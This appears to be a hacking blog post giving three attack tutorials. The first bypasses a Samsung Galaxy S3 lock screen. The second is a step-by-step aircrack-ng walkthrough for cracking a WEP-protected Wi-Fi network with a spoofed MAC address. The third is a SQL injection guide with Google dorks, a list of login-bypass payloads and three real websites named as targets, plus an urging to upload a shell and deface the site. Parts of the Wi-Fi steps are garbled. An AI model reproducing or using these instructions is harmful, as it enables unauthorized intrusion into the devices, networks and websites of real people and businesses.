Hacking Triks & Tips
HOW TO BYPASS SMARTPHONE LOCK SCREEN

How to bypass the Lock screen Samsung Galaxy S3
The bug was discovered by saurav bhardwaj
Steps:
1) On the code entry screen press Emergency Call
2) Then press Emergency Contacts
3) Press the Home button once
4) Just after pressing the Home button press the power button quickly
5) If successful, pressing the power button again will
bring you to the S3's home screen
saurav said that it can "take quite a few attempts to get this working, sometimes this method works straight away, other times it can take more than 20 attempts."
WI-FI NETWORK HACKING

Step 1:- First Download Backtrack from the following link: http://www.remote-exploit.org/backtrack_download.html
Step 2:- Burn the iso image on CD and boot your laptop from CD drive
Step 3:- Select the third boot option(VESA/KDE).
Step 4:- Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window.
Step 5:- Type the following command airmon-ng Note down the interface name. In this example wifi0
Step 6:- airmon-ng stop wifi0
Step 7:- ifconfig wifi0 down
Step 8:- macchanger --mac 00:11:22:33:44:66 wifi0
Step 9:- airmon-ng start wifi0
Step 10:- airodump-ng wifi0 This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption. Notedown BSSID, CH and ESSID somewhere in notepad or paper Note that if the same BSSID is available in the second part with STATION associated with it, means you some one is accessing that network and our task will be little easier. If not than don’t worry we will still crack it.
Step 11:- airodump-ng -c (channel) -w (file name) Replace (channel) with the CH which u had already n (file name) with any name of your choice (bssid) with the BSSID which u had already note --bssid (bssid) wifi0 Note it Leave this console as it is and start new konsole
Step 12:- aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0 If you don’t get Association Successful mesage then keep on trying until you got success.
Step 13:- aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0 Well if you don’t see ARP ACK and sent packets are not increasing or still 0 than it means no 1 is accessing that network.But don’t worry you go an optional step, Leave this console as it is and start new k
Step 14:- aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF konsole message than keep on trying until you get success got an optional step konsole –b (bssid) –h 00:11:22:33:44:66 wfi0 Press y and enter Now you will see that ARP and ACK packets in 2nd console are increasing fast Keep this console as it is and start 4th console.
Step 15:- aircrack-ng -b (bssid) (filename)- Just wait and watch…..Backtrack will do rest of the work. Hurray we got the key.
Done..!!
Demo Of Basic SQL injection for website hacking

You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are
many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection). I will
show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password
and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it. Dorks:
inurl:adminlogin.aspx inurl:admin/index.php inurl:administrator.php inurl:administrator.asp inurl:login.asp
inurl:login.aspx inurl:login.php inurl:admin/index.php inurl:adminlogin.aspx # Try to make your own dorks also to get
more success rate. Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from
where the admins login. Fill the details as: User: 1'or'1'='1 Password: 1'or'1'='1 Use the above mentioned login details and you will be into
the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website. Some websites which I
got: http://gimtech.in/Webadmin/AdminLogin.aspx http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx Other InjecTion Queries: ‘ or 1=1 – 1'or’1'=’1 admin’– ” or 0=0 – or 0=0 – ‘ or 0=0 # ” or 0=0 # or
0=0 # ‘ or ‘x’='x ” or “x”=”x ‘) or (‘x’='x ‘ or 1=1– ” or 1=1– or 1=1– ‘ or a=a– ” or “a”=”a ‘) or (‘a’='a “) or (“a”=”a hi” or “a”=”a hi” or 1=1 – hi’
or 1=1 – hi’ or ‘a’='a hi’) or (‘a’='a hi”) or (“a”=”)

Comments
Post a Comment
Ask me anything here...